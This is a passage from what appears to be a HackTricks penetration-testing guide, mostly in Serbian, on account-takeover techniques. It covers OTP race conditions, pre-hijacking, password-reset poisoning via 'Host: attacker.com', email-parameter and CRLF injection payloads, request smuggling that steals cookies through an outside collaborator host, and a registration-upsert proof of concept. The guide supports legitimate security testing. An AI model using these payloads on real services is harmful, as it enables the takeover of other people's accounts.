def handleResponse(req, interesting): if req.status != 401 and b’Invalid’ not in req.response: table.add(req)

</details>

- Pokušajte racing verification: podnesite isti važeći OTP istovremeno u dve sesije; ponekad jedna sesija postane verified attacker account dok victim flow takođe uspe.
- Takođe testirajte Host header poisoning na verification links (isto kao reset poisoning dole) da biste leak ili kompletirali verifikaciju na hostu pod kontrolom attacker-a.

<a class="content_ref" href="rate-limit-bypass.md"><span class="content_ref_label">Rate Limit Bypass</span></a>

<a class="content_ref" href="2fa-bypass.md"><span class="content_ref_label">2FA/MFA/OTP Bypass</span></a>

<a class="content_ref" href="email-injections.md"><span class="content_ref_label">Email Injections</span></a>

## Account Pre‑Hijacking Techniques (before the victim signs up)

Moćna klasa problema nastaje kada attacker izvrši akcije na victim-ovom email-u pre nego što victim kreira nalog, a zatim kasnije povrati pristup.

Key techniques to test (adapt to the target’s flows):

- Classic–Federated Merge
  - Attacker: registers a classic account with victim email and sets a password
  - Victim: later signs up with SSO (same email)
  - Insecure merges may leave both parties logged in or resurrect the attacker’s access
- Unexpired Session Identifier
  - Attacker: creates account and holds a long‑lived session (don’t log out)
  - Victim: recovers/sets password and uses the account
  - Test if old sessions stay valid after reset or MFA enablement
- Trojan Identifier
  - Attacker: adds a secondary identifier to the pre‑created account (phone, additional email, or links attacker’s IdP)
  - Victim: resets password; attacker later uses the trojan identifier to reset/login
- Unexpired Email Change
  - Attacker: initiates email‑change to attacker mail and withholds confirmation
  - Victim: recovers the account and starts using it
  - Attacker: later completes the pending email‑change to steal the account
- Non‑Verifying IdP
  - Attacker: uses an IdP that does not verify email ownership to assert `victim@…`
  - Victim: signs up via classic route
  - Service merges on email without checking `email_verified` or performing local verification

Praktični saveti

- Harvest flows and endpoints iz web/mobile bundle-ova. Tražite classic signup, SSO linking, email/phone change i password reset endpoints.
- Napravite realističnu automatizaciju da održavate sesije aktivnim dok testirate druge tokove.
- Za SSO testove, podignite test OIDC provider i izdajite tokene sa `email` claim-ovima za adresu žrtve i `email_verified=false` da proverite da li RP veruje unverified IdP-ovima.
- Nakon bilo kog password reset-a ili email change-a, verifikujte da su:
  - svi ostali sessions i tokens nevažeći,
  - pending email/phone change mogućnosti otkazane,
  - prethodno povezani IdP-ovi/email-ovi/telefoni ponovo verifikovani.

Note: Extensive methodology and case studies of these techniques are documented by Microsoft’s pre‑hijacking research (see References at the end).

<a class="content_ref" href="reset-password.md"><span class="content_ref_label">Reset/Forgotten Password Bypass</span></a>

<a class="content_ref" href="race-condition.md"><span class="content_ref_label">Race Condition</span></a>

## **Password Reset Takeover**

### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. Request password reset to your email address
2. Click on the password reset link
3. Don’t change password
4. Click any 3rd party websites(eg: Facebook, twitter)
5. Intercept the request in Burp Suite proxy
6. Check if the referer header is leaking password reset token.

### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Intercept the password reset request in Burp Suite
2. Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Forward the request with the modified header\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. Look for a password reset URL based on the _host header_ like : `https://attacker.com/reset-password.php?token=TOKEN`

### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR na API parametrima

1. Napadač mora da se uloguje sa svojim nalogom i ode na Change password funkcionalnost.
2. Pokrenite Burp Suite i Intercept zahtev
3. Pošaljite ga na repeater tab i izmenite parametre : User ID/email
   powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

Slabi token za reset lozinke

Token za reset lozinke treba da bude nasumično generisan i jedinstven svaki put.
Pokušajte da utvrdite da li token ističe ili je uvek isti — u nekim slučajevima algoritam generisanja je slab i može se pogoditi. Sledeće varijable bi mogle biti korišćene u algoritmu.

• Timestamp
• UserID
• Email of User
• Firstname and Lastname
• Date of Birth
• Cryptography
• Number only
• Small token sequence ( characters between [A-Z,a-z,0-9])
• Token reuse
• Token expiration date

Otkrivanje tokena za reset lozinke

1. Pokrenite zahtev za reset lozinke putem API/UI za konkretnu email adresu npr: test@mail.com
2. Pregledajte odgovor servera i proverite za resetToken
3. Zatim upotrebite token u URL-u kao https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

Reset lozinke putem kolizije korisničkog imena

1. Registrujte se na sistem sa korisničkim imenom identičnim žrtvinom, ali sa belim razmacima umetnutim pre i/ili posle korisničkog imena. npr: "admin "
2. Zatražite reset lozinke koristeći vaš zlonamerni username.
3. Iskoristite token poslat na vaš email i resetujte žrtvinu lozinku.
4. Prijavite se na žrtvin nalog sa novom lozinkom.

Platforma CTFd je bila ranjiva na ovaj napad.
See: CVE-2020-7245

Preuzimanje naloga putem Cross Site Scripting

1. Pronađite XSS u aplikaciji ili na poddomeni ako su cookies scoped na parent domain : *.domain.com
2. Leak the current sessions cookie
3. Autentifikujte se kao korisnik koristeći cookie

Preuzimanje naloga putem HTTP Request Smuggling

1. Upotrebite smuggler da detektujete tip HTTP Request Smuggling-a (CL, TE, CL.TE)
   powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h\
2. Sastavite zahtev koji će prepisati POST / HTTP/1.1 sa sledećim podacima:
   GET http://something.burpcollaborator.net HTTP/1.1 X: sa ciljem da izvršite open redirect žrtava na burpcollab i ukradete njihove cookie-je\
3. Konačan zahtev može izgledati ovako

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone izveštaji o iskorišćavanju ovog buga\

• https://hackerone.com/reports/737140\
• https://hackerone.com/reports/771666

Preuzimanje naloga putem CSRF

1. Napravite payload za CSRF, npr: “HTML obrazac sa automatskim slanjem za promenu lozinke”
2. Pošaljite payload

Preuzimanje naloga putem JWT

JSON Web Token može biti korišćen za autentifikaciju korisnika.

• Izmenite JWT sa drugim User ID / Email
• Proverite da li je JWT potpis slab

JWT Vulnerabilities (Json Web Tokens)

Registracija kao reset (Upsert on Existing Email)

Neki signup handleri izvrše upsert kada dati email već postoji. Ako endpoint prihvata minimalno telo sa email-om i lozinkom i ne zahteva verifikaciju vlasništva, slanjem email-a žrtve biće pre-auth prebrisana njihova lozinka.

• Otkrivanje: prikupite imena endpointa iz bundled JS (ili mobilnog saobraćaja aplikacije), zatim fuzz-ujte bazne putanje kao /parents/application/v4/admin/FUZZ koristeći ffuf/dirsearch.
• Naznake metode: GET koji vraća poruke kao “Only POST request is allowed.” često ukazuje na ispravan HTTP metod i da se očekuje JSON body.
• Minimalno telo primećeno u praksi:

{"email":"victim@example.com","password":"New@12345"}

Primer PoC:

POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json

{"email":"victim@example.com","password":"New@12345"}

Uticaj: Full Account Takeover (ATO) without any reset token, OTP, or email verification.

Reference

• How I Found a Critical Password Reset Bug (Registration upsert ATO)
• Microsoft MSRC – Pre‑hijacking attacks on web user accounts (May 2022)
• https://salmonsec.com/cheatsheet/account_takeover
• Hey there! You are using WhatsApp: Enumerating Three Billion Accounts for Security and Privacy (NDSS 2026 paper & dataset)

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

• Proverite planove pretplate!
• Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
• Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.